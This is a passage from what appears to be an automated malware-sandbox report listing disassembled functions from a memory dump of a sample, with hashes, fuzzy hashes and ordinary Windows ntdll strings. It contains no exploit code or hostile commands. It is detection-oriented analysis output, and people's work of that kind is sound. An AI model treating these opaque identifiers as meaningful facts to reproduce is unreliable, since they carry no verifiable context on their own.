                                                                                                                                                              • Instruction Fuzzy Hash: D441AF32A056519FCB21CE69D840A2BBBE4BF89A50F05056DEF499F325D730E811CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01580BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-2558761708
                                                                                                                                                              • Opcode ID: cac88802451154b06baa219727a2dceb940c613ea0fcef735eff45dce35e10b2
                                                                                                                                                              • Instruction ID: 07bab9573881f75c89e89aca6a03a991a8ffaab3b928e42e581d958927ec0a4a
                                                                                                                                                              • Opcode Fuzzy Hash: cac88802451154b06baa219727a2dceb940c613ea0fcef735eff45dce35e10b2
                                                                                                                                                              • Instruction Fuzzy Hash: 1B11E4313251429FD729DA2CC841B7EB7A4FF8062AF188529F406DF291E734D849C792
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015F20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • LdrpInitializationFailure, xrefs: 015F20FA
                                                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 015F20F3
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015F2104
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-2986994758
                                                                                                                                                              • Opcode ID: 9ce44b346481c5c4bb34e3159a829256e5b838b0bc7c0c5237a27df00ab4ef8b
                                                                                                                                                              • Instruction ID: c3605e4410d0dfdde69b23d409b629a48a594bb5348e7f7a8586641f2f562f9d
                                                                                                                                                              • Opcode Fuzzy Hash: 9ce44b346481c5c4bb34e3159a829256e5b838b0bc7c0c5237a27df00ab4ef8b
                                                                                                                                                              • Instruction Fuzzy Hash: 05F0AFB5A40309ABE724E64DCC67FA93BA8FB80A54F10005DFB046F685D2B0A9108695
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: #%u
                                                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                                                              • Opcode ID: 2edadbe30c13d85d6bd20b0fb7f7fef29ce7ce9382b6d79dcafc80e74ab82806
                                                                                                                                                              • Instruction ID: 8780b590e13ef008f47e88f75473131402baca18c7319a37ceb347d475caa012
                                                                                                                                                              • Opcode Fuzzy Hash: 2edadbe30c13d85d6bd20b0fb7f7fef29ce7ce9382b6d79dcafc80e74ab82806
                                                                                                                                                              • Instruction Fuzzy Hash: 81715971A0110A9FDB11EFA8C990BAEB7F8BF48744F144065E905FB291EB34ED01CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0157A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • LdrResSearchResource Enter, xrefs: 0157AA13
                                                                                                                                                              • LdrResSearchResource Exit, xrefs: 0157AA25
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                              • API String ID: 0-4066393604
                                                                                                                                                              • Opcode ID: ed73a30f474d49bc7192762ce08a46b7aadd43253abff23712b4e254cec9c8e2
                                                                                                                                                              • Instruction ID: 6b7fcf48e5aa6a9412c9eab42c345f945bbf38272ff21152f3969ecdedaa7049
                                                                                                                                                              • Opcode Fuzzy Hash: ed73a30f474d49bc7192762ce08a46b7aadd43253abff23712b4e254cec9c8e2
                                                                                                                                                              • Instruction Fuzzy Hash: 54E19171E0420AAFEB22DF9CD981BAEBBB9BF44310F180866E911EF241D774D940CB51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0163A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: `$`
                                                                                                                                                              • API String ID: 0-197956300
                                                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                              • Instruction ID: b06717838e6d1b48678fd6c058b8338b0da61a8b3da6f74505cea91616b54b41
                                                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                              • Instruction Fuzzy Hash: 96C1AB312043429BEB25CF68CC41B6ABBE6AFD4318F084A2CF6D6CB291D775D505EB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015EE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                                                              • Opcode ID: 4c68e0366b417308b07a46bc30d500a877203a3570152f3f8956af07b1bbd66b
                                                                                                                                                              • Instruction ID: d612a4b68f5463ead7004644122f53e6d0272d1154bda18ee5e0788359c6d88a
                                                                                                                                                              • Opcode Fuzzy Hash: 4c68e0366b417308b07a46bc30d500a877203a3570152f3f8956af07b1bbd66b
                                                                                                                                                              • Instruction Fuzzy Hash: D2615BB1E146099FDB29DFA8C885BADBBF9FB48700F14446DE649EF251D731A900CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 016143D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$MUI
                                                                                                                                                              • API String ID: 0-17815947
                                                                                                                                                              • Opcode ID: 07aee3292ee4e52c9b113a6ee3facc4956d1258d9d2e5939916d9d2ba2523184
                                                                                                                                                              • Instruction ID: cb590f60a865ab8f9e40e9a084664f63639d136557d81e823015354038490269
                                                                                                                                                              • Opcode Fuzzy Hash: 07aee3292ee4e52c9b113a6ee3facc4956d1258d9d2e5939916d9d2ba2523184
                                                                                                                                                              • Instruction Fuzzy Hash: 01510871E0025EAFDF11DFA9CC80AEEBBB8FB44754F140529E611BB294DB319905CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • kLsE, xrefs: 01570540
                                                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0157063D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                              • API String ID: 0-2547482624
                                                                                                                                                              • Opcode ID: 1ffe9402f1fec18d327f7d6ccf6ec9fb88abe1de55d83b80e38360e1d2eb4231
                                                                                                                                                              • Instruction ID: dc770ca6ccdfb8b591edb39d780bdb7bedd7ccd0855eb9ef7514daf75c61912f
                                                                                                                                                              • Opcode Fuzzy Hash: 1ffe9402f1fec18d327f7d6ccf6ec9fb88abe1de55d83b80e38360e1d2eb4231
                                                                                                                                                              • Instruction Fuzzy Hash: FE51B0B15147428FD724DF68E5416ABBBE4BF86304F10483EF69A8B281E770E545CF92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0157A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0157A2FB
                                                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0157A309
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                              • API String ID: 0-2876891731
                                                                                                                                                              • Opcode ID: 2893e504742e959c81cdbf5a8e4fefb25e954f31c6ccf03b95275d58335f604d
                                                                                                                                                              • Instruction ID: 1100c59d51fee86ab1bc8d8124a243da7e60fed234240870601d1f6defbd26e4
                                                                                                                                                              • Opcode Fuzzy Hash: 2893e504742e959c81cdbf5a8e4fefb25e954f31c6ccf03b95275d58335f604d
                                                                                                                                                              • Instruction Fuzzy Hash: 31417831A0464ADBEB21DF6DD841B6EBBB4FF84704F2844A9E910DF295E2B5D940CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015AA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                                                              • Opcode ID: 91ef40e13384978959666cea64d9d8a2fb76011d246b5682bc89dc715d1f361c
                                                                                                                                                              • Instruction ID: 5defcbc3dca2c9c35b7a02780307dd03f7385f91c592445b4703f79059ac7421
                                                                                                                                                              • Opcode Fuzzy Hash: 91ef40e13384978959666cea64d9d8a2fb76011d246b5682bc89dc715d1f361c
                                                                                                                                                              • Instruction Fuzzy Hash: 8201DCB2694700AFD321DF24DE45B2AB7E8F794B29F008939B648CB190E374E804CB46
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0157C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: MUI
                                                                                                                                                              • API String ID: 0-1339004836
                                                                                                                                                              • Opcode ID: d20f30afbae35cf9758f43d95493cf15973eba8c513d09697d1ccfbde14a692c
                                                                                                                                                              • Instruction ID: 50516f2d942eb51cf1112602d6fd42ceff7b352e44fcc9a2ec8256e16d9d8b79
                                                                                                                                                              • Opcode Fuzzy Hash: d20f30afbae35cf9758f43d95493cf15973eba8c513d09697d1ccfbde14a692c
                                                                                                                                                              • Instruction Fuzzy Hash: 8B826C75E0021A8FEB25CFA9E881BEDBBB5BF48310F148169E919AF351D7709981CF50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015F6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              • Opcode ID: 473b6621cfc186001f6b3a4efbee27148b324fa3e7e47557e1a41e5d26a99235
                                                                                                                                                              • Instruction ID: 31387e436fcf8a7fdc90af9f3db4e3a886e34731a80dbf015b3e7776ea78a4b6
                                                                                                                                                              • Opcode Fuzzy Hash: 473b6621cfc186001f6b3a4efbee27148b324fa3e7e47557e1a41e5d26a99235
                                                                                                                                                              • Instruction Fuzzy Hash: D0916071A0021AAFEB21DB95CC85FAE7BB9FF55B50F100069F700BF191D675A900CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0161E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              • Opcode ID: 060b2d998f7e718d8275dcedb46c7a6dc0b709a6eaa9d588fe53a7867e87f82e
                                                                                                                                                              • Instruction ID: b17c4b9f74b99a04d94e90ed8a88749ec3a118b648434c38bd5258e4726e41fa
                                                                                                                                                              • Opcode Fuzzy Hash: 060b2d998f7e718d8275dcedb46c7a6dc0b709a6eaa9d588fe53a7867e87f82e
                                                                                                                                                              • Instruction Fuzzy Hash: FF919171A0050AAEDB27ABA5DC54FEFBBB9FF85740F140019F901AB254D776D902CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015AA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: GlobalTags
                                                                                                                                                              • API String ID: 0-1106856819
                                                                                                                                                              • Opcode ID: c7474268cfe001c93c49429e152390d2399bb207b9feb85c2a2cf620ccd26e06
                                                                                                                                                              • Instruction ID: e10bac8e7e2694431788ccfa6d10471b1d75ddf3c2dacbc5b2c6a2b6c77ae0ed
                                                                                                                                                              • Opcode Fuzzy Hash: c7474268cfe001c93c49429e152390d2399bb207b9feb85c2a2cf620ccd26e06
                                                                                                                                                              • Instruction Fuzzy Hash: 3A717EB5E4420A8FDF28CF9DD5946ADBBF2BFA8780F14812EE505AB241E7309941CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01614978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .mui
                                                                                                                                                              • API String ID: 0-1199573805
                                                                                                                                                              • Opcode ID: 495613d1c416c9bab8ee7295a3c0d956c8ca8f99aa829cdf029a418466bfb949
                                                                                                                                                              • Instruction ID: 28789b43ad19ba86ac0074f66e2dbd620c9db5a0857bf1b8956795c3ffd008c6
                                                                                                                                                              • Opcode Fuzzy Hash: 495613d1c416c9bab8ee7295a3c0d956c8ca8f99aa829cdf029a418466bfb949
                                                                                                                                                              • Instruction Fuzzy Hash: 3A517372D0022A9BDF10DF99DC40AAEBBB4BF54B14F09416AED11BB358DB349901CBA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0158E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: EXT-
                                                                                                                                                              • API String ID: 0-1948896318
                                                                                                                                                              • Opcode ID: 75d16df6b93a2e923f35854ab7278b11291650ad92e8e6730b50bd012db588f2
                                                                                                                                                              • Instruction ID: d1cc9b801fd6dc7fa3114b64861bbfabe57cab6728aa6789c4cbc5363c225d9c
                                                                                                                                                              • Opcode Fuzzy Hash: 75d16df6b93a2e923f35854ab7278b11291650ad92e8e6730b50bd012db588f2
                                                                                                                                                              • Instruction Fuzzy Hash: 434160725083529BD711FA65C842B6FB7E8FF88614F04092DB594EF180E674D9048796
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015EC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: BinaryHash
                                                                                                                                                              • API String ID: 0-2202222882
                                                                                                                                                              • Opcode ID: 9fc6bef73b92618fe9620d0c4c317de23007cb2563f31d99e930e9cf27c7d72a
                                                                                                                                                              • Instruction ID: 9a38c18fee2c95b753926ec335f0b5d846e04aa23c20ab3c13f3fa6e6aebbc59
                                                                                                                                                              • Opcode Fuzzy Hash: 9fc6bef73b92618fe9620d0c4c317de23007cb2563f31d99e930e9cf27c7d72a
                                                                                                                                                              • Instruction Fuzzy Hash: 774122B1D0052EAADB25DA54CD84FDEB7BCBB45714F0045A5EB08AF140DB70AE898FA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01606B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: #
                                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                                              • Opcode ID: 08b9a559efa1a33bfa2f6f0dae12c98ef3ff528f29c9bdfe10f7fa530f1d80a6
                                                                                                                                                              • Instruction ID: e58a101259409456dc842f64de6faebf0edac39f99b0e427fc02c19d08e8a680
                                                                                                                                                              • Opcode Fuzzy Hash: 08b9a559efa1a33bfa2f6f0dae12c98ef3ff528f29c9bdfe10f7fa530f1d80a6
                                                                                                                                                              • Instruction Fuzzy Hash: 0B310331A0061A9AEB27DB69CC50BEF7BB8EF44704F144068E941AF2C2DB75E865CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015ECA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: BinaryName
                                                                                                                                                              • API String ID: 0-215506332
                                                                                                                                                              • Opcode ID: d384197c62eef44d8275cccd2b301259b3831b28e402e4896666d98150ebf79b
                                                                                                                                                              • Instruction ID: b6aff690b19a0a677cf69c01bb61652c40c1cf8dfb1a9ac94bcf06a82f8a60b7
                                                                                                                                                              • Opcode Fuzzy Hash: d384197c62eef44d8275cccd2b301259b3831b28e402e4896666d98150ebf79b
                                                                                                                                                              • Instruction Fuzzy Hash: AB31E036D00516AFEF19DA58C859EAFBBB8FB80720F014569A911AF250D630EE00DBE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015F892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015F895E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                              • API String ID: 0-702105204
                                                                                                                                                              • Opcode ID: 1808a57191f8490c32e681e2c43f1c495ab3c9616cd0f3071ca8bc39ec697354
                                                                                                                                                              • Instruction ID: fef93b21fe59f663148f9076c3f7ea4d4e7f7eec694f99ba0a576e5f05785754
                                                                                                                                                              • Opcode Fuzzy Hash: 1808a57191f8490c32e681e2c43f1c495ab3c9616cd0f3071ca8bc39ec697354
                                                                                                                                                              • Instruction Fuzzy Hash: 5101F2322102029FE7206A59DE85F5A7BA9FFD1294B04142CF7420E561CB20A880C792
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01612000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a303184f439d402fd750dd1366f696d67df2bc28db770b5656d1dc133238b8d1
                                                                                                                                                              • Instruction ID: 9ee66a80456836bb624f12ffd414f2b4ebe095d4b0c567b57eabea7cb614c40e
                                                                                                                                                              • Opcode Fuzzy Hash: a303184f439d402fd750dd1366f696d67df2bc28db770b5656d1dc133238b8d1
                                                                                                                                                              • Instruction Fuzzy Hash: C342B0716083429BDB25CF68CCA0A6BBBE5BF88700F2D492DFA8297354D770D845CB52
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01608158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 227b91e8a1cf1c454216680ffc0e076ad036a147c8fdee483a19873316890510
                                                                                                                                                              • Instruction ID: 29bc3563893f8d0bd46b2a0b9a5a28af480d72af243655e36afb48bd9f1bded1
                                                                                                                                                              • Opcode Fuzzy Hash: 227b91e8a1cf1c454216680ffc0e076ad036a147c8fdee483a19873316890510
                                                                                                                                                              • Instruction Fuzzy Hash: 40424F75E102198FEB29CF69CC41BAEBBF9BF88310F158099E549EB281D7349985CF50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01582840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4f5b5211284d223388ae933c227167a433cb5b8c9e6d76e46f62eaedb3ce023e
                                                                                                                                                              • Instruction ID: 660a7e9f0855345b88bfe8f466bda6cc71bfc6e04f0e1ff291fc605e4a769ca0
                                                                                                                                                              • Opcode Fuzzy Hash: 4f5b5211284d223388ae933c227167a433cb5b8c9e6d76e46f62eaedb3ce023e
